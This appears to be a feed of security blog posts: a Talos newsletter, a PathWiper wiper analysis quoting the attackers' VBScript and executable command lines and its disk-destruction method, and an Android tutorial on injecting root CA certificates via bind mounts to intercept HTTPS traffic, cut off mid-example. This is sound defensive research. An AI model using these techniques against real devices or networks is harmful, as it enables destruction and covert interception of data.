Solo: A Pixel 6 Pro Story (When one bug is all you need)

5 June 2025 at 00:00
During my internship I was tasked to analyze a Mali GPU exploit on Pixel 7/8 devices and adapt it to make it work on another device: the Pixel 6 Pro. While the exploit process itself is relatively straightforward to reproduce (in theory we just need to find the correct symbol offsets and signatures for our target device), what’s interesting about Pixel 6 Pro is that it uses a different Mali GPU from the Pixel 7/8, which lacked support for a feature that one of the two vulnerabilities within the exploit relied on:

Everyone's on the cyber target list

5 June 2025 at 18:00
Welcome to this week’s edition of the Threat Source newsletter. 

I’ve discovered that being a rent guarantor for someone is an involved experience. While I’m glad that I can help out a loved one secure a better rental property, the process of verifying my identity and ability to cover any missed payments required handing over far more personal and financial data than I was comfortable with. 

I asked the agent about their information security policies and cybersecurity posture. I was relieved to hear that they delete all the personal data within two weeks of processing, but I was concerned that the person dealing with my dossier didn’t think that they were at risk of a cyber attack. They believed that because they had a low online profile and their organisation was small, they didn’t present as a target. 

Not wanting to jeopardise my position as a guarantor, I didn’t argue further beyond offering a few words of advice. The truth is that everyone is a target. Many criminals do not discriminate; they seek to compromise anyone and see how they can make money from a compromise once access is achieved. Sophisticated criminals research their targets and their wider ecosystem of suppliers and partners in depth to identify potential weak points. It only takes a moment’s inattention for anyone to fall for a phishing or social engineering scam. 

Cybersecurity training needs to reinforce the fact that anyone can be a victim of a cyber attack. No matter how careful you are, or how insignificant you think you might be, an attack can still catch you off guard. The good news is that by ensuring basic cyber hygiene, we can make a lot of progress towards preventing harm. 

Impressing on users the need to install updates promptly, the importance of having end-point protection and using multi-factor authentication is not a panacea, but it is a basic foundation upon which more advanced protection can be built. 

Good cybersecurity begins with an awareness of the threat, an acknowledgement that we are all at risk, and knowing the potential consequences. Nobody is too insignificant, too small or too well hidden to escape the risk of cyber attack. Suitable protection follows from reflecting on what is at risk and what could possibly go wrong.

The one big thing 

Talos has uncovered a destructive attack on Ukrainian critical infrastructure involving a new wiper malware, "PathWiper," deployed through a legitimate endpoint administration framework. Talos attributes this attack to a Russia-linked APT actor, underscoring the persistent threat to Ukraine's infrastructure amid the ongoing war. 

Why do I care? 

This attack highlights the sophisticated tactics of state-sponsored threat actors and the risks critical infrastructure entities face, which could have global implications for cybersecurity and geopolitical stability. 

So now what? 

Organizations, particularly those managing critical infrastructure, should strengthen their endpoint security, monitor for unusual administrative activity, and stay informed on evolving threats to mitigate potential risks.

Top security headlines of the week

New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch 
The high-severity flaw is being tracked as CVE-2025-5419 (CVSS score: 8.8), and has been flagged as an out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine. (The Hacker News)

Vanta bug exposed customers’ data to other customers 
Compliance company Vanta has confirmed that a bug exposed the private data of some of its customers to other Vanta customers. The company told TechCrunch that the data exposure was a result of a product code change and not caused by an intrusion. (TechCrunch)

Data Breach Affects 38K UChicago Medicine Patients 
UChicago Medicine released a statement that the data of 38K patients may have been exposed by a third-party debt collector's system breach. The exposed data may include SSNs, addresses, dates of birth, medical information, and financial account information. (UPI)

Can’t get enough Talos? 

Fake AI installers target businesses. Catch up on the ransomware and malware threats Talos discovered circulating in the wild and masquerading as legitimate AI tool installers. Read the blog or listen to our most recent Talos Takes to hear Hazel and Chetan, the author, discuss the blog in more depth.

Talos at Cisco Live 2025. From a live IR tabletop session to learning how to outsmart identity attacks, there's plenty of Talos to keep you going in San Diego next week. Browse the sessions Talos is participating in, and we'll see you there!

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   
MD5: 7bdbd180c081fa63ca94f9c22c457376   
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details  
Typical Filename: IMG001.exe  
Detection Name: Simple_Custom_Detection 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Typical Filename: VID001.exe 
Detection Name: Simple_Custom_Detection 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine

5 June 2025 at 10:00
  • Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper”. 
  • The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, which was then used to issue malicious commands and deploy PathWiper across connected endpoints. 
  • Talos attributes this disruptive attack and the associated wiper to a Russia-nexus advanced persistent threat (APT) actor. Our assessment is made with high confidence based on tactics, techniques and procedures (TTPs) and wiper capabilities overlapping with destructive malware previously seen targeting Ukrainian entities.  
  • The continued evolution of wiper malware variants highlights the ongoing threat to Ukrainian critical infrastructure despite the longevity of the Russia-Ukraine war. 

Proliferation of PathWiper 

Any commands issued by the administrative tool’s console were received by its client running on the endpoints. The client then executed the command as a batch (BAT) file, with the command line partially resembling that of Impacket command executions, though such commands do not necessarily indicate the presence of Impacket in an environment.

The BAT file consisted of a command to execute a malicious VBScript file called ‘uacinstall.vbs’, also pushed to the endpoint by the administrative console: 

C:\WINDOWS\System32\WScript.exe C:\WINDOWS\TEMP\uacinstall.vbs

Upon execution, the VBScript wrote the PathWiper executable, named ‘sha256sum.exe’, to disk and executed it: 

C:\WINDOWS\TEMP\sha256sum.exe 

Throughout the course of the attack, filenames and actions used were intended to mimic those deployed by the administrative utility’s console, indicating that the attackers had prior knowledge of the console and possibly its functionality within the victim enterprise’s environment.

PathWiper capabilities 

On execution, PathWiper replaces the contents of artifacts related to the file system with random data generated on the fly. It first gathers a list of connected storage media on the endpoint, including: 

  • Physical drive names 
  • Volume names and paths 
  • Network shared and unshared (removed) drive paths 

Although most storage devices and volumes are discovered programmatically (via APIs), the wiper also queries ‘HKEY_USERS\Network\<drive_letter>\RemotePath’ to obtain the paths of shared network drives for destruction. 

Once all the storage media information has been collected, PathWiper creates one thread per drive and volume for every path recorded and overwrites artifacts with randomly generated bytes. The wiper reads multiple file system attributes, such as the following from the New Technology File System (NTFS), and then overwrites the contents of these artifacts directly on disk with random data: 

  • MBR 
  • $MFT 
  • $MFTMirr 
  • $LogFile 
  • $Boot 
  • $Bitmap 
  • $TxfLog 
  • $Tops 
  • $AttrDef 

Before overwriting the contents of the artifacts, the wiper also attempts to dismount volumes by sending the FSCTL_DISMOUNT_VOLUME IOCTL to the MountPointManager device object. PathWiper also destroys files on disk by overwriting them with randomized bytes. 

PathWiper’s mechanisms are somewhat semantically similar to another wiper family, HermeticWiper, previously seen targeting Ukrainian entities in 2022. HermeticWiper, also known as FoxBlade or NEARMISS, is attributed to Russia’s Sandworm group in third-party reporting with medium to high confidence. Both wipers attempt to corrupt the master boot record (MBR) and NTFS-related artifacts.  

 A significant difference between HermeticWiper and PathWiper is the corruption mechanisms used against recorded drives and volumes. PathWiper programmatically identifies all connected (including dismounted) drives and volumes on the system, identifies volume labels for verification and documents valid records. This differs from HermeticWiper's simple process of enumerating physical drives from 0 to 100 and attempting to corrupt them. 

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org

Snort 2 rules: 64742, 64743 

Snort 3 rules: 301174

Indicators of compromise (IOCs) 

7C792A2B005B240D30A6E22EF98B991744856F9AB55C74DF220F32FE0D00B6B3

SonicDoor – Cracking SonicWall’s SMA 500

4 June 2025 at 09:36
While attempting to compare the security level of various VPN vendors, I kept falling down the path of searching for vulnerabilities instead. This blog post details the ones I discovered in SonicWall’s SMA 500, which were patched in December 2024. This post has been delayed to coincide with my talk at SecurityFest on this exact …

Intercepting traffic on Android with Mainline and Conscrypt

5 June 2025 at 07:00

TL;DR: The AlwaysTrustUserCerts module now supports Android 7 through Android 16 Beta. If you want to learn more about Mainline, Conscrypt and how everything works together, keep reading!

Intro

To properly test the backend of any mobile application, we need to intercept (and modify) the API traffic. We could use Swagger or Postman files if they are available, but it’s a lot easier to intercept real traffic so we don’t have to worry about providing correct values, sequencing, etc.

Sometimes intercepting traffic is very straightforward: You configure a device proxy, install your proxy certificate on the device and you’re good to go. This was even the default behavior until Android stopped trusting user certificates by default. On recent versions of Android, this will only work if the network security config has been modified to include user certificates, or if the user certificate has been moved into the system certificate repository.
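
For completeness, a minimal sketch of that second workaround (moving a proxy CA into the system store on a rooted device) could look like the commands below. The file names are illustrative, and it assumes the system partition can still be remounted read-write, which is not the case on many modern devices; Android expects each system CA to be a PEM file named after its old-style subject hash:

$ openssl x509 -inform DER -in proxy_ca.der -out proxy_ca.pem
$ hash=$(openssl x509 -subject_hash_old -noout -in proxy_ca.pem)
$ adb push proxy_ca.pem /sdcard/$hash.0
$ adb shell "su -c 'mount -o rw,remount /system && cp /sdcard/$hash.0 /system/etc/security/cacerts/ && chmod 644 /system/etc/security/cacerts/$hash.0'"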

Android 14 (A14) made interception a bit more difficult by moving all root certificates to a Mainline module, as I’ll explain below. Recently though, one of our devices was showing the same behavior, even on A13. While I was surprised initially, it actually makes a lot of sense. Let’s dive in!

Android’s Conscrypt module and Mainline

The Conscrypt module, which was introduced in Android 9, is used by the Android OS to verify the TLS certificates of HTTPS connections. It contains Conscrypt itself in the form of a Java security provider, and the BoringSSL library, Google's fork of OpenSSL. Conscrypt is still the default security provider on Android 15 (A15).

In Android 10, Google introduced Mainline, which is a way for Google to update certain parts of the Android OS without requiring an over-the-air (OTA) update. These updates are installed via the Google Play services app and therefore require a device with Google Play on board. Since Mainline updates are completely separate from system updates, even devices that no longer receive official OS updates can still receive security updates for selected components. Since its introduction in Android 10, many modules have been merged into Mainline, currently bringing the total to 33 modules for A15.

As a result, devices typically have two update levels:

  • Android Security Update (ASU): Delivered as OTA updates by the OEM
  • Google Play System Update (GPSU): Delivered by Google via Google Play
An Android 13 (A13) device with two patch levels: The Android Security Update (ASU) level and the Google Play System Update (GPSU) level

Internally, Mainline modules are located in the /apex/ folder and can be viewed with root permissions. On a fresh Android 13 (A13) installation (UP1A.231005.007), the /apex/ folder might look as follows:

$ ls -lh /apex
total 256K
-rw-r--r--  1 root   system  11K 2025-05-12 17:20 apex-info-list.xml
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.adbd
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.adbd@331314022
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.adservices
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.adservices@331418080
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.apex.cts.shim
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.apex.cts.shim@1
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.appsearch
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.appsearch@331311000
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.art
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.art@331413030
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.btservices
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.btservices@331716000
drwxr-xr-x  5 system system 4.0K 1970-01-01 01:00 com.android.cellbroadcast
drwxr-xr-x  5 system system 4.0K 1970-01-01 01:00 com.android.cellbroadcast@331411000
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.compos
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.compos@1
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.conscrypt
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.conscrypt@331411000

The apex-info-list.xml contains an overview of the installed modules. For example, for com.android.conscrypt we have the following element:

<?xml version="1.0" encoding="utf-8"?>
<apex-info-list>
...
<apex-info
   moduleName="com.android.conscrypt"
   modulePath="/data/apex/decompressed/com.android.conscrypt@331411000.decompressed.apex"
   preinstalledModulePath="/system/apex/com.google.android.conscrypt.apex"
   versionCode="331411000"
   versionName=""
   isFactory="true"
   isActive="true"
   lastUpdateMillis="1747063014"
   provideSharedApexLibs="false"
/>
...
</apex-info-list>

The Conscrypt module itself contains some metadata, the BoringSSL library, and the Conscrypt security provider:

$ ls -lah /apex/com.android.conscrypt
total 48K
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 .
drwxr-xr-x 64 root   root   1.3K 2025-05-12 11:37 ..
-rw-r--r--  1 system system   61 1970-01-01 01:00 apex_manifest.json
-rw-r--r--  1 system system  103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 bin
drwxr-xr-x  3 root   shell  4.0K 1970-01-01 01:00 etc
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 javalib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib64
drwx------  2 root   root    16K 1970-01-01 01:00 lost+found  

Android 14 (A14): Updatable root certificate authorities

When Android validates a TLS certificate chain, it does so using a collection of root certificate authorities. All versions of Android have the /system/etc/security/cacerts folder:

$ ls /system/etc/security/cacerts
00673b5b.0  35105088.0  5e4e69e7.0  88950faa.0  b0f3e76e.0  d16a5865.0
04f60c28.0  399e7759.0  5f47b495.0  89c02a45.0  b3fb433b.0  d18e9066.0
0d69c7e1.0  3a3b02ce.0  60afe812.0  8d6437c3.0  b74d2bd5.0  d41b5e2a.0
10531352.0  3ad48a91.0  6187b673.0  91739615.0  b7db1890.0  d4c339cb.0
111e6273.0  3c58f906.0  63a2c897.0  9282e51c.0  b872f2b4.0  d59297b8.0
12d55845.0  3c6676aa.0  67495436.0  9339512a.0  b936d1c6.0  d7746a63.0
1dcd6f4c.0  3c860d51.0  69105f4f.0  9479c8c3.0  bc3f2570.0  da7377f6.0
1df5a75f.0  3c899c73.0  6b03dec0.0  9576d26b.0  bd43e1dd.0  dbc54cab.0
1e1eab7c.0  3c9a4d3b.0  75680d2e.0  95aff9e3.0  bdacca6f.0  dbff3a01.0
1e8e7201.0  3d441de8.0  76579174.0  9685a493.0  bf64f35b.0  dc99f41e.0
1eb37bdf.0  3e7271e8.0  7892ad52.0  9772ca32.0  c2c1704e.0  dfc0fe80.0
1f58a078.0  40dc992e.0  7999be0d.0  985c1f52.0  c491639e.0  e442e424.0
219d9499.0  455f1b52.0  7a7c655d.0  9d6523ce.0  c51c224c.0  e48193cf.0
23f4c490.0  48a195d8.0  7a819ef2.0  9f533518.0  c559d742.0  e775ed2d.0
27af790d.0  4be590e0.0  7c302982.0  a2c66da8.0  c7e2a638.0  e8651083.0
2add47b6.0  5046c355.0  7d453d8f.0  a3896b44.0  c907e29b.0  ed39abd0.0
2d9dafe4.0  524d9b43.0  81b9768f.0  a7605362.0  c90bc37d.0  f013ecaf.0
2fa87019.0  52b525c7.0  82223c44.0  a7d2cf64.0  cb156124.0  f0cd152c.0
302904dd.0  583d0756.0  85cde254.0  a81e292b.0  cb1c3204.0  f459871d.0
304d27c3.0  5a250ea7.0  86212b19.0  ab5346f4.0  ccc52f49.0  facacbc6.0
31188b5e.0  5a3f0ff8.0  869fbf79.0  ab59055e.0  cf701eeb.0  fb5fa911.0
33ee480d.0  5acf816d.0  87753b0d.0  aeb67534.0  d06393bb.0  fd08c599.0
343eb6cb.0  5cf9d536.0  882de061.0  b0ed035a.0  d0cddf45.0  fde84897.0

However, with A14, Google started including a cacerts folder inside of the /apex/com.android.conscrypt/ package, too:

$ ls -l /apex/com.android.conscrypt/
-rw-r--r-- 1 system system   103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 bin
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 cacerts
drwxr-xr-x 3 root   shell   4096 1970-01-01 01:00 etc
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 javalib
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 lib64
drwx------ 2 root   root   16384 1970-01-01 01:00 lost+found

The original certificates on /system are still available, but they are only used as a fallback; if the cacerts folder is available via conscrypt, it will get priority over the ones stored at /system/etc/security/cacerts. The code below, taken from /apex/com.android.conscrypt/javalib/conscrypt.jar, shows this behavior. Note that this snippet also hints at a potential alternative way to disable apex certificate management via the system.certs.enabled property:

static {
    String ANDROID_ROOT = System.getenv("ANDROID_ROOT");
    String ANDROID_DATA = System.getenv("ANDROID_DATA");
    File updatableDir = new File("/apex/com.android.conscrypt/cacerts");
    if (System.getProperty("system.certs.enabled") != null && System.getProperty("system.certs.enabled").equals("true")) {
        defaultCaCertsSystemDir = new File(ANDROID_ROOT + "/etc/security/cacerts");
    } else if (updatableDir.exists() && updatableDir.list().length != 0) {
        defaultCaCertsSystemDir = updatableDir;
    } else {
        defaultCaCertsSystemDir = new File(ANDROID_ROOT + "/etc/security/cacerts");
    }
    TrustedCertificateStore.setDefaultUserDirectory(new File(ANDROID_DATA + "/misc/keychain"));
}

So we could enable this system property and be done with it, but there are actually a few issues:

  • Setting this property with setprop/resetprop won’t work; the properties managed by these tools are a separate set from the ones you get via System.getProperty (see the sketch after this list)
  • Google may modify this behavior in the future, so it’s not very future-proof
  • Injecting the property into the Dalvik VM may be detected by RASP
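
To illustrate the first point, consider this quick, hypothetical experiment on a rooted device. Even if the property service accepts the value (SELinux property contexts may block it on some builds), Conscrypt reads the Java system properties of the app's VM, which are a separate namespace, so the check in the snippet above is never satisfied:

$ adb shell su -c 'setprop system.certs.enabled true'
$ adb shell getprop system.certs.enabled
# Even if getprop now reports "true", System.getProperty("system.certs.enabled")
# inside an app process still returns null: Java system properties live in the VM
# and are not backed by the Android property service.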

The AlwaysTrustUserCerts module currently only copies user certificates into the /system/ directory, which was enough until now. By adding the certificates before Zygote is initialized, the certificates automatically propagate to all apps when they are forked from Zygote. To make the module work with A14, we want to still copy the user certs into /system/, but also make sure that they are added to the /apex/ directory.

Unfortunately, adding certificates to the /apex/ folder is more complicated, as documented by Tim Perry on the httptoolkit blog: Any changes we make here will not automatically propagate to new applications, due to the way each app’s /apex folder is mounted.

As suggested in the httptoolkit blogpost, there are a few potential solutions, some of which require iteratively going into every process and updating the mounts to pick up our changes. To make sure the update covers both /system and /apex certificates, the module now does the following:

  1. Collect all user and /system certs and copy them into $MODULE/system/etc/security/cacerts
  2. Magisk/KernelSU will automatically overlay this onto the original /system/etc/security/cacerts folder
  3. Wait for zygote to become available and mount /system/etc/security/cacerts onto /apex/com.android.conscrypt/cacerts in zygote and all its children
  4. Monitor zygote to make sure the mount is still there. When zygote crashes, the mount disappears and we need to inject it again

Step 3 is required because even though zygote will see the newly mounted certificates, the mount will not propagate to its children, since /apex/ is specifically mounted with PRIVATE propagation.
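
As a rough illustration of steps 3 and 4, the core of the approach could look something like the sketch below. This is a simplified, hypothetical version (the real module also handles multiple zygote restarts, SELinux labels and the A15 quirks discussed later); the variable names mirror the snippet shown further down:

#!/system/bin/sh
SYS_CERT_DIR=/system/etc/security/cacerts
APEX_CERT_DIR=/apex/com.android.conscrypt/cacerts

# Bind our merged certificate directory over the Conscrypt apex cacerts folder
# inside zygote's mount namespace; newly forked apps inherit it automatically.
for zp in $(pidof zygote zygote64); do
    /system/bin/nsenter --mount=/proc/$zp/ns/mnt -- /bin/mount --bind $SYS_CERT_DIR $APEX_CERT_DIR

    # Processes already forked from zygote have their own private /apex mounts,
    # so patch each of them individually as well.
    for pid in $(ps -A -o PID,PPID | awk -v z=$zp '$2 == z {print $1}'); do
        /system/bin/nsenter --mount=/proc/$pid/ns/mnt -- /bin/mount --bind $SYS_CERT_DIR $APEX_CERT_DIR 2>/dev/null
    done
done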

It took a bit of work, but AlwaysTrustUserCerts now allows you to fully intercept HTTPS traffic on A14 🥳.

What about older versions?

A14 comes with Mainline-updatable root CAs out of the box. But… the whole idea of Mainline is to bring important security updates to devices without requiring a full OTA update. Managing root certificate authorities is definitely a security-critical service, and since Conscrypt is part of Mainline, these updates can be made available to pre-A14 devices, too!

A commit from December 2022 mentions the inclusion of CA certificates in apex:

Add conscrypt updatable certificates.

This cl adds the new blueprint files required for certificate loading, and an additional ca_certificates_apex build rule used to create the prebuilt modules for loading certificates. While we currently have to list out all certificates within Conscrypt's apex build rules, we intend to later avoid that step.

But which devices will get this specific update? This question is answered a few commits later, when the minSDK is set to 30 (A11):

Merge "Add minSdkVersion="30" to Conscrypt APEX" into main

It’s currently still at this value, so let’s do a quick test and flash A11.0.0 (RP1A.200720.009, Sep 2020) onto my Pixel 3a device. After the initial installation, we have version 300900703, which does not yet have a cacerts folder:

$ ls -lh com.android.conscrypt@300900703/
total 22K
-rw-r--r-- 1 system system   62 1970-01-01 01:00 apex_manifest.json
-rw-r--r-- 1 system system   85 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 bin
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 etc
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 javalib
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 lib
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 lib64
drwx------ 2 root   root    16K 1970-01-01 01:00 lost+found

Unfortunately, try as I might, I couldn’t trigger a GPSU. After doing some research, it seems that multiple users have this issue, and the suggested fix is to update to A12. So let’s give that a try and install SP1A.210812.015, the first available A12 version for the Pixel 3a:

# SP1A.210812.015 - pre update
sargo:/apex/com.android.conscrypt@310727000 # ls -l
total 44
-rw-r--r-- 1 system system    62 1970-01-01 01:00 apex_manifest.json
-rw-r--r-- 1 system system   103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 bin
drwxr-xr-x 3 root   shell   4096 1970-01-01 01:00 etc
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 javalib
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 lib
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 lib64
drwx------ 2 root   root   16384 1970-01-01 01:00 lost+found

Luckily, this time we do get an update after refreshing the update window a few times (April 1st, 2025), and the cacerts folder is now available:

# SP1A.210812.015 - post update (April 1st 2025 update)
sargo:/apex/com.android.conscrypt@351412000 # ls -lah
total 48K
drwxr-xr-x  9 system system 4.0K 1970-01-01 01:00 .
drwxr-xr-x 55 root   root   1.1K 2025-05-13 09:59 ..
-rw-r--r--  1 system system  103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 bin
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 cacerts
drwxr-xr-x  3 root   shell  4.0K 1970-01-01 01:00 etc
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 javalib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib64
drwx------  2 root   root    16K 1970-01-01 01:00 lost+found

This means that, depending on your GPSU level, your device may or may not use apex-based certificates starting as early as A12. Other devices may still get GPSUs on A11 though, so let’s dig a bit deeper. (Note: At the time of writing, only A14+ devices will use the apex certificates, as explained down below)
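
If you want to check where a particular device stands, a quick look (in a rooted adb shell; the pm flags below are available on recent Android versions) at the installed Conscrypt APEX and its contents tells you whether updatable root CAs are present:

# Version of the active Conscrypt Mainline module
$ pm list packages --apex-only --show-versioncode | grep conscrypt

# Does the active module ship an updatable CA store?
$ ls /apex/com.android.conscrypt/ | grep cacerts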

Backporting to Android 11 (A11)

My Pixel 3a doesn’t get a GPSU on A11, but it does already have a conscrypt APEX folder installed. Since the conscrypt module supports A11, we should be able to install the newer conscrypt version on our A11 installation, as long as we can find the correct apex file. Apex files shouldn’t be device-specific (that would defeat the entire point) so why don’t we just pull it from the A12 version and install it on A11?

Extracting the apex is actually straightforward, as it’s stored on-disk in /data/apex/active/:

$ adb pull /data/apex/active/com.android.conscrypt@351412000.apex
/data/apex/active/com.android.conscrypt@351412000.apex: 1 file pulled, 0 skipped. 31.9 MB/s (7237632 bytes in 0.216s)

Next, let’s flash RQ3A.211001.001 (A11) and install the apex file. Installation should be as easy as installing an APK:

$ adb install com.android.conscrypt@351412000.apex
Failure [INSTALL_FAILED_DUPLICATE_PACKAGE: Scanning Failed.: com.google.android.conscrypt is an APEX package and can't be installed as an APK.]

Weird. A different documentation page suggests using --staged while installing, which does work:

$ adb install --staged com.android.conscrypt@351412000.apex
Performing Streamed Install
Success. Reboot device to apply staged session

Finally, after rebooting, we do see our newly installed conscrypt version:

$ ls /apex/com.android.conscrypt@351412000
apex_manifest.pb  bin  cacerts  etc  javalib  lib  lib64  lost+found

Success! Since the signature is valid, the APEX module is loaded and the device now has apex-based CAs! However, after some testing, it turns out that even though the folder is available, the system still falls back to the old /system location. At some point, Google updated the initialization logic to also check the current SDK version. This logic is currently also included in the latest installable Conscrypt version via Mainline:

static {
    String ANDROID_ROOT = System.getenv("ANDROID_ROOT");
    String ANDROID_DATA = System.getenv("ANDROID_DATA");
    File updatableDir = new File("/apex/com.android.conscrypt/cacerts");
    if (shouldUseApex(updatableDir)) {
        defaultCaCertsSystemDir = updatableDir;
    } else {
        defaultCaCertsSystemDir = new File(ANDROID_ROOT + "/etc/security/cacerts");
    }
    TrustedCertificateStore.setDefaultUserDirectory(new File(ANDROID_DATA + "/misc/keychain"));
}

static boolean shouldUseApex(File updatableDir) {
    Object sdkVersion = getSdkVersion();
    if (sdkVersion == null || ((Integer) sdkVersion).intValue() < 34) {
        return false;
    }
    if ((System.getProperty("system.certs.enabled") != null && System.getProperty("system.certs.enabled").equals("true")) || !updatableDir.exists() || ArrayUtils.isEmpty(updatableDir.list())) {
        return false;
    }
    return true;
}

So even though the cacerts folder exists via APEX, it won’t be used on anything below A14. That being said, it’s not unthinkable that this logic could be changed in the future. If a root certificate is ever compromised (e.g. like the DigiNotar hack), Google could actually remove the compromised certificate from all Mainline-enabled devices!

In the intro, I mentioned that we did see this behavior on A13. Unfortunately, I could not confirm this, since the device had since received the latest mainline update and it’s not straightforward to collect previous versions of a specific Mainline module. Traffic interception did work after manually mounting the certificate into /apex/ though.

As a final step, let’s clean up and remove the APEX module again. Even though the module is called com.android.conscrypt, it’s not the correct package name to uninstall it:

$ adb uninstall com.android.conscrypt
Failure [DELETE_FAILED_INTERNAL_ERROR]

The correct package name is actually contained within the APEX file we installed earlier, which is com.google.android.conscrypt. Why a different package name? 🤷‍♂️

$ adb -d uninstall com.google.android.conscrypt
Success
$ ls /apex/com.android.conscrypt/
apex_manifest.json  apex_manifest.pb  bin  etc  javalib  lib  lib64  lost+found

But wait, there’s more (Android 15+)

On A15, something weird happens. After installing the AlwaysTrustUserCerts module, all of the certificates have disappeared:

Normal list of certificates on the left, an empty list on the right.

It took me a while to figure this out, but luckily the fix is really simple. The problem is twofold:

  1. I was mounting /system/etc/security/cacerts onto /apex/com.android.conscrypt/cacerts
  2. With A15, each certificate in /system/etc/security/cacerts is actually a mount itself:
 $ mount | grep cert
/dev/block/dm-7 on /system/etc/security/otacerts.zip type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/bf64f35b.0 type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/5acf816d.0 type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/d41b5e2a.0 type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/33ee480d.0 type ext4 (ro,seclabel,noatime)
...

So why have the certificates disappeared? Well, the module collects all the certificates into $MODDIR/system/etc/security/cacerts, which is then automatically overlaid onto the real /system/etc/security/cacerts location.

Then, the /system/etc/security/cacerts folder is bind-mounted into each process, which should make the contents of the folder available. However, since every file inside /system/etc/security/cacerts is now itself a mount, these nested mounts are not automatically propagated by a plain bind mount. The fix? Use --rbind instead of --bind when entering the process:

# Wrong
/system/bin/nsenter --mount=/proc/$zp/ns/mnt -- /bin/mount --bind $SYS_CERT_DIR $APEX_CERT_DIR

# Correct
